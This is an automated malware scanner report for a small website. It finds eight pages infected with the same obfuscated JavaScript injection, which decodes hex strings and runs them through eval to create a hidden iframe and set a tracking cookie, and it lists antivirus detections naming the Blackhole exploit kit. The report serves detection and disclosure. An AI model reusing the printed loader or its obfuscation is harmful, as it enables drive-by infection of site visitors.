New scan:

Malware Scanner report for community-resource-assoc.com

Malicious/Suspicious/Total urls checked
8/0/17
8 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "community-resource-assoc.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=community-resource-assoc.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://community-resource-assoc.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 11 Oct 2014 12:33:33 GMT
Location: http://www.community-resource-assoc.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.community-resource-assoc.com/xmlrpc.php
X-Powered-By: PHP/5.4.33
clean
http://www.community-resource-assoc.com/
200 OK
Content-Length: 23461
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/wp-includes/js/comment-reply.js?ver=20090102
200 OK
Content-Length: 786
Content-Type: application/javascript
clean
http://www.community-resource-assoc.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
200 OK
Content-Length: 93889
Content-Type: application/javascript
clean
http://www.community-resource-assoc.com/wp-content/themes/canvas/canvas/includes/js/slides.min.jquery.js?ver=3.3.2
200 OK
Content-Length: 6908
Content-Type: application/javascript
clean
http://www.community-resource-assoc.com/wp-content/themes/canvas/canvas/includes/js/feedback.js?ver=3.3.2
200 OK
Content-Length: 2251
Content-Type: application/javascript
clean
http://www.community-resource-assoc.com/wp-content/themes/canvas/canvas/includes/js/general.js?ver=3.3.2
200 OK
Content-Length: 4656
Content-Type: application/javascript
clean
http://www.community-resource-assoc.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=3.08
200 OK
Content-Length: 37156
Content-Type: application/javascript
clean
http://www.community-resource-assoc.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.1.2
200 OK
Content-Length: 6208
Content-Type: application/javascript
clean
http://community-resource-assoc.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Sat, 11 Oct 2014 12:33:43 GMT
Pragma: no-cache
Location: http://www.community-resource-assoc.com/test404page.js
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 11 Oct 2014 12:33:43 GMT
X-Pingback: http://www.community-resource-assoc.com/xmlrpc.php
X-Powered-By: PHP/5.4.33
clean
http://www.community-resource-assoc.com/test404page.js
404 Not Found
Content-Length: 18807
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/about/
200 OK
Content-Length: 20240
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/royal-oak/
200 OK
Content-Length: 20172
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/southwind-eastpointe/
200 OK
Content-Length: 20235
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/skylake-ranch/
200 OK
Content-Length: 20176
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/topaz-i/
200 OK
Content-Length: 20079
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://www.community-resource-assoc.com/topaz-ii/
200 OK
Content-Length: 20096
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

wdfmb="spl"+"i"+"t";qvnto=window;zqiau="0"+"x";sgfp=(5-3-1);try{--(document["body"])}catch(gikwwp){ffirdy=false;try{}catch(grncfq){ffirdy=21;}if(1){fpw="17:5d:6c:65:5a:6b:60:66:65:17:6a:5d:64:6d:5b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:5d:64:6d:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e
... 3493 bytes are skipped ...
63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:5d:64:6d:5b:27:30:1f:20:32:4:1:74:4:1:74"[wdfmb](":");}qvnto=fpw;zdao=[];for(fmyteu=22-20-2;-fmyteu+1413!=0;fmyteu+=1){cvrym=fmyteu;if((0x19==031))zdao+=String.fromCharCode(eval(zqiau+qvnto[1*cvrym])+0xa-sgfp);}avyh=eval;avyh(zdao)}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
Comodo
Exploit.JS.Expack.G
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
ViRobot
JS.A.Agent.4493.C
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Trojan-Downloader.JS.Agent.gyg
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOW!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgzaxv
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
JS/Exploit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: community-resource-assoc.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 11 Oct 2014 12:33:33 GMT
Location: http://www.community-resource-assoc.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.community-resource-assoc.com/xmlrpc.php
X-Powered-By: PHP/5.4.33

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: community-resource-assoc.com
Referer: http://www.google.com/search?q=community-resource-assoc.com

Result:
The result is similar to the first query. There are no suspicious redirects found.